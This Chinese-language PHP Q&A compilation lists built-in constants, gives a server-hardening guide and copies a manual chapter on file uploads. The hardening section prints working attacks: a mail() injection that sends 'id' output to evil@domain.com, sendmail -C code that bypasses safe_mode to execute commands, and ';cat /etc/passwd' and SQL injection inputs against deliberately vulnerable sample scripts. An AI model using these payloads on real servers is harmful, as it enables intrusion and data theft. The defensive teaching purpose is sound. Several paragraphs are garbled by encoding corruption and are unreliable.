php4.2.2,PHP52

本文目錄一覽:

php 內置大概多少個常量

每個版本的內置常量都例不有同的,要看具體的版本。這些是我收集到的。大概有250個左右吧。參考參考。

PHP_VERSION (string)

PHP_MAJOR_VERSION (integer)    可用自: PHP 5.2.7. 

PHP_MINOR_VERSION (integer)    可用自: PHP 5.2.7. 

PHP_RELEASE_VERSION (integer)    可用自: PHP 5.2.7. 

PHP_VERSION_ID (integer)    可用自: PHP 5.2.7. 

PHP_EXTRA_VERSION (string)    可用自: PHP 5.2.7. 

PHP_ZTS (integer)    可用自: PHP 5.2.7. 

PHP_DEBUG (integer)    可用自: PHP 5.2.7. 

PHP_MAXPATHLEN (integer)    可用自: PHP 5.3.0. 

PHP_OS (string)

PHP_SAPI (string)    可用自: PHP 4.2.0. 參見: php_sapi_name(). 

PHP_EOL (string)    可用自: PHP 4.3.10 and PHP 5.0.2 

PHP_INT_MAX (integer)    可用自: PHP 4.4.0 and PHP 5.0.5 

PHP_INT_SIZE (integer)    可用自: PHP 4.4.0 and PHP 5.0.5 

DEFAULT_INCLUDE_PATH (string)

PEAR_INSTALL_DIR (string)

PEAR_EXTENSION_DIR (string)

PHP_EXTENSION_DIR (string)

PHP_PREFIX (string)    可用自: PHP 4.3.0 

PHP_BINDIR (string)

PHP_LIBDIR (string)

PHP_DATADIR (string)

PHP_SYSCONFDIR (string)

PHP_LOCALSTATEDIR (string)

PHP_CONFIG_FILE_PATH (string)

PHP_CONFIG_FILE_SCAN_DIR (string)

PHP_SHLIB_SUFFIX (string)    可用自: PHP 4.3.0 

PHP_OUTPUT_HANDLER_START (integer)

PHP_OUTPUT_HANDLER_CONT (integer)

PHP_OUTPUT_HANDLER_END (integer)

PHP_WINDOWS_VERSION_MAJOR (integer)    可用自: PHP 5.3.0 

PHP_WINDOWS_VERSION_MINOR (integer)    可用自: PHP 5.3.0 

PHP_WINDOWS_VERSION_BUILD (integer)    可用自: PHP 5.3.0 

PHP_WINDOWS_VERSION_PLATFORM (integer)   可用自: PHP 5.3.0 

PHP_WINDOWS_VERSION_SP_MAJOR (integer)    可用自: PHP 5.3.0 

PHP_WINDOWS_VERSION_SP_MINOR (integer)    可用自: PHP 5.3.0 

PHP_WINDOWS_VERSION_SUITEMASK (integer)    可用自: PHP 5.3.0 

PHP_WINDOWS_VERSION_PRODUCTTYPE (integer)    可用自: PHP 5.3.0 

PHP_WINDOWS_NT_DOMAIN_CONTROLLER (integer)    可用自: PHP 5.3.0 

PHP_WINDOWS_NT_SERVER (integer)    可用自: PHP 5.3.0 

PHP_WINDOWS_NT_WORKSTATION (integer)    可用自: PHP 5.3.0 

E_ERROR (integer)

E_WARNING (integer)

E_PARSE (integer)

E_NOTICE (integer)

E_CORE_ERROR (integer)

E_CORE_WARNING (integer)

E_COMPILE_ERROR (integer)

E_COMPILE_WARNING (integer)

E_USER_ERROR (integer)

E_USER_WARNING (integer)

E_USER_NOTICE (integer)

E_DEPRECATED (integer)    可用自: PHP 5.3.0 

E_USER_DEPRECATED (integer)    可用自: PHP 5.3.0 

E_ALL (integer)

E_STRICT (integer)    可用自: PHP 5.0.0 

__COMPILER_HALT_OFFSET__ (integer)    可用自: PHP 5.1.0 

TRUE (boolean)    參見: Booleans. 

FALSE (boolean)    參見: Booleans. 

NULL (boolean)    參見: Null. 

EXTR_OVERWRITE (integer)

EXTR_SKIP (integer)

EXTR_PREFIX_SAME (integer)

EXTR_PREFIX_ALL (integer)

EXTR_PREFIX_INVALID (integer)

EXTR_PREFIX_IF_EXISTS (integer)

EXTR_IF_EXISTS (integer)

SORT_ASC (integer)

SORT_DESC (integer)

SORT_REGULAR (integer)

SORT_NUMERIC (integer)

SORT_STRING (integer)

CASE_LOWER (integer)

CASE_UPPER (integer)

COUNT_NORMAL (integer)

COUNT_RECURSIVE (integer)

ASSERT_ACTIVE (integer)

ASSERT_CALLBACK (integer)

ASSERT_BAIL (integer)

ASSERT_WARNING (integer)

ASSERT_QUIET_EVAL (integer)

CONNECTION_ABORTED (integer)

CONNECTION_NORMAL (integer)

CONNECTION_TIMEOUT (integer)

INI_USER (integer)

INI_PERDIR (integer)

INI_SYSTEM (integer)

INI_ALL (integer)

M_E (float)

M_LOG2E (float)

M_LOG10E (float)

M_LN2 (float)

M_LN10 (float)

M_PI (float)

M_PI_2 (float)

M_PI_4 (float)

M_1_PI (float)

M_2_PI (float)

M_2_SQRTPI (float)

M_SQRT2 (float)

M_SQRT1_2 (float)

CRYPT_SALT_LENGTH (integer)

CRYPT_STD_DES (integer)

CRYPT_EXT_DES (integer)

CRYPT_MD5 (integer)

CRYPT_BLOWFISH (integer)

DIRECTORY_SEPARATOR (string)

SEEK_SET (integer)

SEEK_CUR (integer)

SEEK_END (integer)

LOCK_SH (integer)

LOCK_EX (integer)

LOCK_UN (integer)

LOCK_NB (integer)

HTML_SPECIALCHARS (integer)

HTML_ENTITIES (integer)

ENT_COMPAT (integer)

ENT_QUOTES (integer)

ENT_NOQUOTES (integer)

INFO_GENERAL (integer)

INFO_CREDITS (integer)

INFO_CONFIGURATION (integer)

INFO_MODULES (integer)

INFO_ENVIRONMENT (integer)

INFO_VARIABLES (integer)

INFO_LICENSE (integer)

INFO_ALL (integer)

CREDITS_GROUP (integer)

CREDITS_GENERAL (integer)

CREDITS_SAPI (integer)

CREDITS_MODULES (integer)

CREDITS_DOCS (integer)

CREDITS_FULLPAGE (integer)

CREDITS_QA (integer)

CREDITS_ALL (integer)

STR_PAD_LEFT (integer)

STR_PAD_RIGHT (integer)

STR_PAD_BOTH (integer)

PATHINFO_DIRNAME (integer)

PATHINFO_BASENAME (integer)

PATHINFO_EXTENSION (integer)

PATH_SEPARATOR (string)

CHAR_MAX (integer)

LC_CTYPE (integer)

LC_NUMERIC (integer)

LC_TIME (integer)

LC_COLLATE (integer)

LC_MONETARY (integer)

LC_ALL (integer)

LC_MESSAGES (integer)

ABDAY_1 (integer)

ABDAY_2 (integer)

ABDAY_3 (integer)

ABDAY_4 (integer)

ABDAY_5 (integer)

ABDAY_6 (integer)

ABDAY_7 (integer)

DAY_1 (integer)

DAY_2 (integer)

DAY_3 (integer)

DAY_4 (integer)

DAY_5 (integer)

DAY_6 (integer)

DAY_7 (integer)

ABMON_1 (integer)

ABMON_2 (integer)

ABMON_3 (integer)

ABMON_4 (integer)

ABMON_5 (integer)

ABMON_6 (integer)

ABMON_7 (integer)

ABMON_8 (integer)

ABMON_9 (integer)

ABMON_10 (integer)

ABMON_11 (integer)

ABMON_12 (integer)

MON_1 (integer)

MON_2 (integer)

MON_3 (integer)

MON_4 (integer)

MON_5 (integer)

MON_6 (integer)

MON_7 (integer)

MON_8 (integer)

MON_9 (integer)

MON_10 (integer)

MON_11 (integer)

MON_12 (integer)

AM_STR (integer)

PM_STR (integer)

D_T_FMT (integer)

D_FMT (integer)

T_FMT (integer)

T_FMT_AMPM (integer)

ERA (integer)

ERA_YEAR (integer)

ERA_D_T_FMT (integer)

ERA_D_FMT (integer)

ERA_T_FMT (integer)

ALT_DIGITS (integer)

INT_CURR_SYMBOL (integer)

CURRENCY_SYMBOL (integer)

CRNCYSTR (integer)

MON_DECIMAL_POINT (integer)

MON_THOUSANDS_SEP (integer)

MON_GROUPING (integer)

POSITIVE_SIGN (integer)

NEGATIVE_SIGN (integer)

INT_FRAC_DIGITS (integer)

FRAC_DIGITS (integer)

P_CS_PRECEDES (integer)

P_SEP_BY_SPACE (integer)

N_CS_PRECEDES (integer)

N_SEP_BY_SPACE (integer)

P_SIGN_POSN (integer)

N_SIGN_POSN (integer)

DECIMAL_POINT (integer)

RADIXCHAR (integer)

THOUSANDS_SEP (integer)

THOUSEP (integer)

GROUPING (integer)

YESEXPR (integer)

NOEXPR (integer)

YESSTR (integer)

NOSTR (integer)

CODESET (integer)

LOG_EMERG (integer)

LOG_ALERT (integer)

LOG_CRIT (integer)

LOG_ERR (integer)

LOG_WARNING (integer)

LOG_NOTICE (integer)

LOG_INFO (integer)

LOG_DEBUG (integer)

LOG_KERN (integer)

LOG_USER (integer)

LOG_MAIL (integer)

LOG_DAEMON (integer)

LOG_AUTH (integer)

LOG_SYSLOG (integer)

LOG_LPR (integer)

LOG_NEWS (integer)

LOG_UUCP (integer)

LOG_CRON (integer)

LOG_AUTHPRIV (integer)

LOG_LOCAL0 (integer)

LOG_LOCAL1 (integer)

LOG_LOCAL2 (integer)

LOG_LOCAL3 (integer)

LOG_LOCAL4 (integer)

LOG_LOCAL5 (integer)

LOG_LOCAL6 (integer)

LOG_LOCAL7 (integer)

LOG_PID (integer)

LOG_CONS (integer)

LOG_ODELAY (integer)

LOG_NDELAY (integer)

LOG_NOWAIT (integer)

LOG_PERROR (integer)

php安全配置 如何配置使其更安全

一、Web服務器安全

PHP其實不過是Web服務器的一個模塊功能,所以首先要保證Web服務器的安全。當然Web服務器要安全又必須是先保證系統安全,這樣就扯遠了,無窮無盡。PHP可以和各種Web服務器結合,這裡也只討論Apache。非常建議以chroot方式安裝啟動Apache,這樣即使Apache和PHP及其腳本出現漏洞,受影響的也只有這個禁錮的系統,不會危害實際系統。但是使用chroot的Apache後,給應用也會帶來一定的麻煩,比如連接mysql時必須用127.0.0.1地址使用tcp連接而不能用localhost實現socket連接,這在效率上會稍微差一點。還有mail函數發送郵件也是個問題,因為php.ini里的:

[mail function]

; For Win32 only.

SMTP = localhost

; For Win32 only.

sendmail_from = me@localhost.com

都是針對Win32平台,所以需要在chroot環境下調整好sendmail。

二、PHP本身問題

1、遠程溢出

PHP-4.1.2以下的所有版本都存在文件上傳遠程緩衝區溢出漏洞,而且攻擊程序已經廣泛流傳,成功率非常高:

2、遠程拒絕服務

PHP-4.2.0和PHP-4.2.1存在PHP multipart/form-data POST請求處理遠程漏洞,雖然不能獲得本地用戶權限,但是也能造成拒絕服務。

3、safe_mode繞過漏洞

還有PHP-4.2.2以下到PHP-4.0.5版本都存在PHP mail函數繞過safe_mode限制執行命令漏洞,4.0.5版本開始mail函數增加了第五個參數,由於設計者考慮不周可以突破safe_mode的限制執行命令。其中4.0.5版本突破非常簡單,只需用分號隔開後面加shell命令就可以了,比如存在PHP腳本evil.php:

? mail(“foo@bar,”foo”,”bar”,””,$bar); ?

執行如下的URL:

;/usr/bin/id|mail evil@domain.com

這將id執行的結果發送給evil@domain.com。

對於4.0.6至4.2.2的PHP突破safe_mode限制其實是利用了sendmail的-C參數,所以系統必須是使用sendmail。如下的代碼能夠突破safe_mode限制執行命令:

?

# 注意,下面這兩個必須是不存在的,或者它們的屬主和本腳本的屬主是一樣

$script=”/tmp/script123″;

$cf=”/tmp/cf123″;

$fd = fopen($cf, “w”);

fwrite($fd, “OQ/tmp

Sparse=0

R$*” . chr(9) . “$#local $@ $1 $: $1

Mlocal, P=/bin/sh, A=sh $script”);

fclose($fd);

$fd = fopen($script, “w”);

fwrite($fd, “rm -f $script $cf; “);

fwrite($fd, $cmd);

fclose($fd);

mail(“nobody”, “”, “”, “”, “-C$cf”);

?

還是使用以上有問題版本PHP的用戶一定要及時升級到最新版本,這樣才能消除基本的安全問題。

三、PHP本身的安全配置

PHP的配置非常靈活,可以通過php.ini, httpd.conf, .htaccess文件(該目錄必須設置了AllowOverride All或Options)進行設置,還可以在腳本程序里使用ini_set()及其他的特定的函數進行設置。通過phpinfo()和get_cfg_var()函數可以得到配置選項的各個值。

如果配置選項是唯一PHP_INI_SYSTEM屬性的,必須通過php.ini和httpd.conf來修改,它們修改的是PHP的Master值,但修改之後必須重啟apache才能生效。其中php.ini設置的選項是對Web服務器所有腳本生效,httpd.conf里設置的選項是對該定義的目錄下所有腳本生效。

如果還有其他的PHP_INI_USER, PHP_INI_PERDIR, PHP_INI_ALL屬性的選項就可以使用.htaccess文件設置,也可以通過在腳本程序自身用ini_set()函數設定,它們修改的是Local值,改了以後馬上生效。但是.htaccess只對當前目錄的腳本程序生效,ini_set()函數只對該腳本程序設置ini_set()函數以後的代碼生效。各個版本的選項屬性可能不盡相同,可以用如下命令查找當前源代碼的main.c文件得到所有的選項,以及它的屬性:

# grep PHP_INI_ /PHP_SRC/main/main.c

在討論PHP安全配置之前,應該好好了解PHP的safe_mode模式。

1、safe_mode

safe_mode是唯一PHP_INI_SYSTEM屬性,必須通過php.ini或httpd.conf來設置。要啟用safe_mode,只需修改php.ini:

safe_mode = On

或者修改httpd.conf,定義目錄:

Directory /var/www

Options FollowSymLinks

php_admin_value safe_mode 1

/Directory

重啟apache後safe_mode就生效了。啟動safe_mode,會對許多PHP函數進行限制,特別是和系統相關的文件打開、命令執行等函數。

所有操作文件的函數將只能操作與腳本UID相同的文件,比如test.php腳本的內容為:

?include(“index.html”)?

幾個文件的屬性如下:

# ls -la

total 13

drwxr-xr-x 2 root root 104 Jul 20 01:25 .

drwxr-xr-x 16 root root 384 Jul 18 12:02 ..

-rw-r–r– 1 root root 4110 Oct 26 2002 index.html

-rw-r–r– 1 www-data www-data 41 Jul 19 19:14 test.php

在瀏覽器請求test.php會提示如下的錯誤信息:

Warning: SAFE MODE Restriction in effect. The script whose uid/gid is 33/33 is not allowed to access ./index.html owned by uid/gid 0/0 in /var/www/test.php on line 1

如果被操作文件所在目錄的UID和腳本UID一致,那麼該文件的UID即使和腳本不同也可以訪問的,不知這是否是PHP的一個漏洞還是另有隱情。所以php腳本屬主這個用戶最好就只作這個用途,絕對禁止使用root做為php腳本的屬主,這樣就達不到safe_mode的效果了。

如果想將其放寬到GID比較,則打開 safe_mode_gid可以考慮只比較文件的GID,可以設置如下選項:

safe_mode_gid = On

設置了safe_mode以後,所有命令執行的函數將被限制只能執行php.ini里safe_mode_exec_dir指定目錄里的程序,而且shell_exec、`ls -l`這種執行命令的方式會被禁止。如果確實需要調用其它程序,可以在php.ini做如下設置:

safe_mode_exec_dir = /usr/local/php/exec

然後拷貝程序到該目錄,那麼php腳本就可以用system等函數來執行該程序。而且該目錄里的shell腳本還是可以調用其它目錄里的系統命令。

safe_mode_include_dir string

當從此目錄及其子目錄(目錄必須在 include_path 中或者用完整路徑來包含)包含文件時越過 UID/GID 檢查。

從 PHP 4.2.0 開始,本指令可以接受和 include_path 指令類似的風格用分號隔開的路徑,而不只是一個目錄。

指定的限制實際上是一個前綴,而非一個目錄名。這也就是說「safe_mode_include_dir = /dir/incl」將允許訪問「/dir/include」和「/dir/incls」,如果它們存在。如果您希望將訪問控制在一個指定的目錄,那麼請在結尾加上一個斜線,例如:「safe_mode_include_dir = /dir/incl/」。

safe_mode_allowed_env_vars string

設置某些環境變罧贍蓯喬痹詰陌踩?笨凇1局噶畎??幸桓齠漢歐指艫那白毫斜懟T詘踩?J較攏?沒е荒芨謀淠切┟?志哂性謖飫鍰峁┑那白旱幕肪潮淞俊D?杴榭魷攏?沒е荒萇柚靡?PHP_ 開頭的環境變量(例如 PHP_FOO = BAR)。

注: 如果本指令為空,PHP 將使用戶可以修改任何環境變量!

safe_mode_protected_env_vars string

本指令包含有一個逗號分隔的環境變量的列表,最終用戶不能用 putenv() 來改變這些環境變量。甚至在 safe_mode_allowed_env_vars 中設置了允許修改時也不能改變這些變量。

雖然safe_mode不是萬能的(低版本的PHP可以繞過),但還是強烈建議打開安全模式,在一定程度上能夠避免一些未知的攻擊。不過啟用safe_mode會有很多限制,可能對應用帶來影響,所以還需要調整代碼和配置才能和諧。被安全模式限制或屏蔽的函數可以參考PHP手冊。

討論完safe_mode後,下面結合程序代碼實際可能出現的問題討論如何通過對PHP服務器端的配置來避免出現的漏洞。

2、變量濫用

PHP默認register_globals = On,對於GET, POST, Cookie, Environment, Session的變罧梢災苯幼⒉岢扇?直淞俊K?塹淖⒉崴承蚴莢ariables_order = “EGPCS”(可以通過php.ini修改),同名變量variables_order右邊的覆蓋左邊,所以變量的濫用極易造成程序的混亂。而且腳本程序員往往沒有對變量初始化的習慣,像如下的程序片斷就極易受到攻擊:

?

//test_1.php

if ($pass == “hello”)

$auth = 1;

if ($auth == 1)

echo “some important information”;

else

echo “nothing”;

?

攻擊者只需用如下的請求就能繞過檢查:

這雖然是一個很弱智的錯誤,但一些著名的程序也有犯過這種錯誤,比如phpnuke的遠程文件拷貝漏洞

PHP-4.1.0發佈的時候建議關閉register_globals,並提供了7個特殊的數組變量來使用各種變量。對於從GET、POST、COOKIE等來的變量並不會直接註冊成變量,必需通過數組變量來存取。PHP-4.2.0發佈的時候,php.ini默認配置就是register_globals = Off。這使得程序使用PHP自身初始化的默認值,一般為0,避免了攻擊者控制判斷變量。

解決方法:

配置文件php.ini設置register_globals = Off。

要求程序員對作為判斷的變量在程序最開始初始化一個值。

3、文件打開

極易受攻擊的代碼片斷:

?

//test_2.php

if (!($str = readfile(“$filename”))) {

echo(“Could not open file: $filenameBR\n”);

exit;

}

else {

echo $str;

}

?

由於攻擊者可以指定任意的$filename,攻擊者用如下的請求就可以看到/etc/passwd:

如下請求可以讀php文件本身:

PHP中文件打開函數還有fopen(), file()等,如果對文件名變量檢查不嚴就會造成服務器重要文件被訪問讀取。

解決方法:

如非特殊需要,把php的文件操作限制在web目錄裏面。以下是修改apache配置文件httpd.conf的一個例子:

Directory /usr/local/apache/htdocs

php_admin_value open_basedir /usr/local/apache/htdocs

/Directory

重啟apache後,/usr/local/apache/htdocs目錄下的PHP腳本就只能操作它自己目錄下的文件了,否則PHP就會報錯:

Warning: open_basedir restriction in effect. File is in wrong directory in xxx on line xx.

使用safe_mode模式也能避免這種問題,前面已經討論過了。

4、包含文件

極易受攻擊的代碼片斷:

?

//test_3.php

if(file_exists($filename))

include(“$filename”);

?

這種不負責任的代碼會造成相當大的危害,攻擊者用如下請求可以得到/etc/passwd文件:

如果對於Unix版的PHP(Win版的PHP不支持遠程打開文件)攻擊者可以在自己開了http或ftp服務的機器上建立一個包含shell命令的文件,的內容是?passthru(“ls /etc”)?,那麼如下的請求就可以在目標主機執行命令ls /etc:

攻擊者甚至可以通過包含apache的日誌文件access.log和error.log來得到執行命令的代碼,不過由於干擾信息太多,有時不易成功。

對於另外一種形式,如下代碼片斷:

?

//test_4.php

include(“$lib/config.php”);

?

攻擊者可以在自己的主機建立一個包含執行命令代碼的config.php文件,然後用如下請求也可以在目標主機執行命令:

PHP的包含函數有include(), include_once(), require(), require_once。如果對包含文件名變量檢查不嚴就會對系統造成嚴重危險,可以遠程執行命令。

解決方法:

要求程序員包含文件里的參數盡量不要使用變量,如果使用變量,就一定要嚴格檢查要包含的文件名,絕對不能由用戶任意指定。

如前面文件打開中限制PHP操作路徑是一個必要的選項。另外,如非特殊需要,一定要關閉PHP的遠程文件打開功能。修改php.ini文件:

allow_url_fopen = Off

重啟apache。

5、文件上傳

php的文件上傳機制是把用戶上傳的文件保存在php.ini的upload_tmp_dir定義的臨時目錄(默認是系統的臨時目錄,如:/tmp)里的一個類似phpxXuoXG的隨機臨時文件,程序執行結束,該臨時文件也被刪除。PHP給上傳的文件定義了四個變量:(如form變量名是file,而且register_globals打開)

$file #就是保存到服務器端的臨時文件(如/tmp/phpxXuoXG )

$file_size #上傳文件的大小

$file_name #上傳文件的原始名稱

$file_type #上傳文件的類型

推薦使用:

$HTTP_POST_FILES[file][tmp_name]

$HTTP_POST_FILES[file][size]

$HTTP_POST_FILES[file][name]

$HTTP_POST_FILES[file][type]

這是一個最簡單的文件上傳代碼:

?

//test_5.php

if(isset($upload) $file != “none”) {

copy($file, “/usr/local/apache/htdocs/upload/”.$file_name);

echo “文件”.$file_name.”上傳成功!點擊a href=\”$PHP_SELF\”繼續上傳/a”;

exit;

}

?

html

head

title文件上傳/title

meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″

/head

body bgcolor=”#FFFFFF”

form enctype=”multipart/form-data” method=”post”

上傳文件:

input type=”file” name=”file” size=”30″

input type=”submit” name=”upload” value=”上傳”

/form

/body

/html

這樣的上傳代碼存在讀取任意文件和執行命令的重大問題。

下面的請求可以把/etc/passwd文檔拷貝到web目錄/usr/local/apache/htdocs/test(注意:這個目錄必須nobody可寫)下的attack.txt文件里:

… ile_name=attack.txt

然後可以用如下請求讀取口令文件:

攻擊者可以把php文件拷貝成其它擴展名,泄漏腳本源代碼。

攻擊者可以自定義form里file_name變量的值,上傳覆蓋任意有寫權限的文件。

攻擊者還可以上傳PHP腳本執行主機的命令。

解決方法:

PHP-4.0.3以後提供了is_uploaded_file和move_uploaded_file函數,可以檢查操作的文件是否是用戶上傳的文件,從而避免把系統文件拷貝到web目錄。

使用$HTTP_POST_FILES數組來讀取用戶上傳的文件變量。

嚴格檢查上傳變量。比如不允許是php腳本文件。

把PHP腳本操作限制在web目錄可以避免程序員使用copy函數把系統文件拷貝到web目錄。move_uploaded_file不受open_basedir的限制,所以不必修改php.ini里upload_tmp_dir的值。

把PHP腳本用phpencode進行加密,避免由於copy操作泄漏源碼。

嚴格配置文件和目錄的權限,只允許上傳的目錄能夠讓nobody用戶可寫。

對於上傳目錄去掉PHP解釋功能,可以通過修改httpd.conf實現:

Directory /usr/local/apache/htdocs/upload

php_flag engine off

#如果是php3換成php3_engine off

/Directory

重啟apache,upload目錄的php文件就不能被apache解釋了,即使上傳了php文件也沒有問題,只能直接顯示源碼。

6、命令執行

下面的代碼片斷是從PHPNetToolpack摘出,詳細的描述見:

?

//test_6.php

system(“traceroute $a_query”,$ret_strs);

?

由於程序沒有過濾$a_query變量,所以攻擊者可以用分號來追加執行命令。

攻擊者輸入如下請求可以執行cat /etc/passwd命令:

;cat /etc/passwd

PHP的命令執行函數還有system(), passthru(), popen()和“等。命令執行函數非常危險,慎用。如果要使用一定要嚴格檢查用戶輸入。

解決方法:

要求程序員使用escapeshellcmd()函數過濾用戶輸入的shell命令。

啟用safe_mode可以杜絕很多執行命令的問題,不過要注意PHP的版本一定要是最新的,小於PHP-4.2.2的都可能繞過safe_mode的限制去執行命令。

7、sql_inject

如下的SQL語句如果未對變量進行處理就會存在問題:

select * from login where user=$user and pass=$pass

攻擊者可以用戶名和口令都輸入1 or 1=1繞過驗證。

不過幸虧PHP有一個默認的選項magic_quotes_gpc = On,該選項使得從GET, POST, COOKIE來的變量自動加了addslashes()操作。上面SQL語句變成了:

select * from login where user=1\ or 1=\1 and pass=1\ or 1=\1

從而避免了此類sql_inject攻擊。

對於數字類型的字段,很多程序員會這樣寫:

select * from test where id=$id

由於變量沒有用單引號擴起來,就會造成sql_inject攻擊。幸虧MySQL功能簡單,沒有sqlserver等數據庫有執行命令的SQL語句,而且PHP的mysql_query()函數也只允許執行一條SQL語句,所以用分號隔開多條SQL語句的攻擊也不能奏效。但是攻擊者起碼還可以讓查詢語句出錯,泄漏系統的一些信息,或者一些意想不到的情況。

解決方法:

要求程序員對所有用戶提交的要放到SQL語句的變量進行過濾。

即使是數字類型的字段,變量也要用單引號擴起來,MySQL自己會把字串處理成數字。

在MySQL里不要給PHP程序高級別權限的用戶,只允許對自己的庫進行操作,這也避免了程序出現問題被 SELECT INTO OUTFILE … 這種攻擊。

8、警告及錯誤信息

PHP默認顯示所有的警告及錯誤信息:

error_reporting = E_ALL ~E_NOTICE

display_errors = On

在平時開發調試時這非常有用,可以根據警告信息馬上找到程序錯誤所在。

正式應用時,警告及錯誤信息讓用戶不知所措,而且給攻擊者泄漏了腳本所在的物理路徑,為攻擊者的進一步攻擊提供了有利的信息。而且由於自己沒有訪問到錯誤的地方,反而不能及時修改程序的錯誤。所以把PHP的所有警告及錯誤信息記錄到一個日誌文件是非常明智的,即不給攻擊者泄漏物理路徑,又能讓自己知道程序錯誤所在。

修改php.ini中關於Error handling and logging部分內容:

error_reporting = E_ALL

display_errors = Off

log_errors = On

error_log = /usr/local/apache/logs/php_error.log

然後重啟apache,注意文件/usr/local/apache/logs/php_error.log必需可以讓nobody用戶可寫。

9、disable_functions

如果覺得有些函數還有威脅,可以設置php.ini里的disable_functions(這個選項不能在httpd.conf里設置),比如:

disable_functions = phpinfo, get_cfg_var

可以指定多個函數,用逗號分開。重啟apache後,phpinfo, get_cfg_var函數都被禁止了。建議關閉函數phpinfo, get_cfg_var,這兩個函數容易泄漏服務器信息,而且沒有實際用處。

10、disable_classes

這個選項是從PHP-4.3.2開始才有的,它可以禁用某些類,如果有多個用逗號分隔類名。disable_classes也不能在httpd.conf里設置,只能在php.ini配置文件里修改。

11、open_basedir

前面分析例程的時候也多次提到用open_basedir對腳本操作路徑進行限制,這裡再介紹一下它的特性。用open_basedir指定的限制實際上是前綴,不是目錄名。也就是說 “open_basedir = /dir/incl” 也會允許訪問 “/dir/include” 和 “/dir/incls”,如果它們存在的話。如果要將訪問限制在僅為指定的目錄,用斜線結束路徑名。例如:”open_basedir = /dir/incl/”。

可以設置多個目錄,在Windows中,用分號分隔目錄。在任何其它系統中用冒號分隔目錄。作為Apache模塊時,父目錄中的open_basedir路徑自動被繼承。

四、其它安全配置

1、取消其它用戶對常用、重要系統命令的讀寫執行權限

一般管理員維護只需一個普通用戶和管理用戶,除了這兩個用戶,給其它用戶能夠執行和訪問的東西應該越少越好,所以取消其它用戶對常用、重要系統命令的讀寫執行權限能在程序或者服務出現漏洞的時候給攻擊者帶來很大的迷惑。記住一定要連讀的權限也去掉,否則在linux下可以用/lib/ld-linux.so.2 /bin/ls這種方式來執行。

如果要取消某程如果是在chroot環境里,這個工作比較容易實現,否則,這項工作還是有些挑戰的。因為取消一些程序的執行權限會導致一些服務運行不正常。PHP的mail函數需要/bin/sh去調用sendmail發信,所以/bin/bash的執行權限不能去掉。這是一項比較累人的工作,

2、去掉apache日誌其它用戶的讀權限

apache的access-log給一些出現本地包含漏洞的程序提供了方便之門。通過提交包含PHP代碼的URL,可以使access-log包含PHP代碼,那麼把包含文件指向access-log就可以執行那些PHP代碼,從而獲得本地訪問權限。

如果有其它虛擬主機,也應該相應去掉該日誌文件其它用戶的讀權限。

當然,如果你按照前面介紹的配置PHP那麼一般已經是無法讀取日誌文件了。

php錯誤提示

警告:未知:你的腳本可能依賴於一個存在於PHP4.2.3以前版本的會話的副作用。

請注意,session擴展不考慮將全局變量作為數據源,除非register_globals選項被打開。你可以通過分別將session.bug_compat_42 或者session.bug_compat_warn 設置成off來禁用這個功能和警告信息。

#導致的原因是你使用的語法已經不被當前使用PHP版本所推薦~

求實現php文件上傳代碼

PHP上傳文件非常簡單,你需要一個上傳的HTML文件(FORM),一個保存文件的PHP文件(保存),一個查詢上傳文件清單的工具。

真正實現完整功能的上傳和管理需要使用數據庫,我的網站俱樂部裏面上傳文件一開放很快就傳了幾萬個文件。

最簡單的方法不用數據庫,可以用一個PHP文件實現,這個文件列出指定目錄下的所有文件,然後提供一個上傳的FORM,最後檢測是否提交了FORM數據,是就保存文件到指定位置。

PHP手冊第39章有關於處理這些問題的說明,我複製粘貼如下:

 

上一頁  V. 特點 下一頁 

——————————————————————————–

第 39 章 文件上傳處理

目錄

POST 方法上傳

錯誤信息說明

常見缺陷

上傳多個文件

對 PUT 方法的支持

POST 方法上傳

本特性可以使用戶上傳文本和二進制文件。用 PHP 的認證和文件操作函數,可以完全控制允許哪些人上傳以及文件上傳後怎樣處理。 

PHP 能夠接受任何來自符合 RFC-1867 標準的瀏覽器(包括 Netscape Navigator 3 及更高版本,打了補丁的 Microsoft Internet Explorer 3 或者更高版本)上傳的文件。 

相關的設置: 請參閱 php.ini 的 file_uploads,upload_max_filesize,upload_tmp_dirpost_max_size 以及 max_input_time 設置選項。 

請注意 PHP 也支持 PUT 方法的文件上傳,Netscape Composer 和 W3C 的 Amaya 客戶端使用這種方法。請參閱對 PUT 方法的支持以獲取更多信息。 

例 39.1. 文件上傳表單

可以如下建立一個特殊的表單來支持文件上傳: 

    

!– The data encoding type, enctype, MUST be specified as below —

form enctype=”multipart/form-data” action=”__URL__” method=”POST”

    !– MAX_FILE_SIZE must precede the file input field —

    input type=”hidden” name=”MAX_FILE_SIZE” value=”30000″ /

    !– Name of input element determines name in $_FILES array —

    Send this file: input name=”userfile” type=”file” /

    input type=”submit” value=”Send File” /

/form

    

以上範例中的 __URL__ 應該被換掉,指向一個真實的 PHP 文件。 

MAX_FILE_SIZE 隱藏字段(單位為位元組)必須放在文件輸入字段之前,其值為接收文件的最大尺寸。這是對瀏覽器的一個建議,PHP 也會檢查此項。在瀏覽器端可以簡單繞過此設置,因此不要指望用此特性來阻擋大文件。實際上,PHP 設置中的上傳文件最大值是不會失效的。但是最好還是在表單中加上此項目,因為它可以避免用戶在花時間等待上傳大文件之後才發現文件過大上傳失敗的麻煩。 

注意: 要確保文件上傳表單的屬性是 enctype=”multipart/form-data”,否則文件上傳不了。 

全局變量 $_FILES 自 PHP 4.1.0 起存在(在更早的版本中用 $HTTP_POST_FILES 替代)。此數組包含有所有上傳的文件信息。 

以上範例中 $_FILES 數組的內容如下所示。我們假設文件上傳字段的名稱如上例所示,為 userfile。名稱可隨意命名。 

$_FILES[‘userfile’][‘name’]

客戶端機器文件的原名稱。 

$_FILES[‘userfile’][‘type’]

文件的 MIME 類型,如果瀏覽器提供此信息的話。一個例子是「image/gif」。不過此 MIME 類型在 PHP 端並不檢查,因此不要想當然認為有這個值。 

$_FILES[‘userfile’][‘size’]

已上傳文件的大小,單位為位元組。 

$_FILES[‘userfile’][‘tmp_name’]

文件被上傳後在服務端儲存的臨時文件名。 

$_FILES[‘userfile’][‘error’]

和該文件上傳相關的錯誤代碼。此項目是在 PHP 4.2.0 版本中增加的。 

文件被上傳後,默認地會被儲存到服務端的默認臨時目錄中,除非 php.ini 中的 upload_tmp_dir 設置為其它的路徑。服務端的默認臨時目錄可以通過更改 PHP 運行環境的環境變量 TMPDIR 來重新設置,但是在 PHP 腳本內部通過運行 putenv() 函數來設置是不起作用的。該環境變量也可以用來確認其它的操作也是在上傳的文件上進行的。 

例 39.2. 使文件上傳生效

